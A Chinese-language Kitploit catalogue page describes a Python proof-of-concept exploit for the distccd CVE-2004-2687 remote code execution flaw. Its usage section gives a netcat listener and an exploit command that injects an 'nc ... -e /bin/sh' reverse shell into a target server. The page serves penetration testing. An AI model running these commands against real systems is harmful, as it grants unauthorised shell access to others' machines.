Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
distccd_rce_CVE-2004-2687 — 基于Python的针对distccd CVE-2004-2687远程代码执行漏洞的概念验证利用工具,可在易受攻击的服务器上实现未经身份验证的shell访问。 | Kitploit
工具/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

基于Python的针对distccd CVE-2004-2687远程代码执行漏洞的概念验证利用工具,可在易受攻击的服务器上实现未经身份验证的shell访问。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
231年前尚未审核

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ 升级到Python3

概述

该仓库包含针对 distccd 漏洞(标识为 CVE-2004-2687)的概念验证 (PoC) 利用程序。该漏洞存在于 distccd 守护进程中,该进程是 distcc 分布式 C/C++ 编译系统的一部分。当配置不当时,distccd 允许远程攻击者无需任何身份验证即可在服务器上执行任意命令。 漏洞详情

distcc 旨在将编译任务分布到多台机器上,以加速构建过程。然而,如果 distccd 守护进程未得到适当保护,它会暴露远程代码执行 (RCE) 漏洞。这是因为守护进程监听网络端口并接受来自任何客户端的命令,允许它们以运行守护进程的用户身份在服务器上执行 shell 命令。

该漏洞已被分配 CVE-2004-2687,影响 3.1 之前的 distccd 版本。一旦被利用,攻击者可以获取对易受攻击机器的 shell 访问权限,从而导致整个系统可能被攻陷。

root@kitploit:~
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

漏洞:

image

利用:

image

下载工具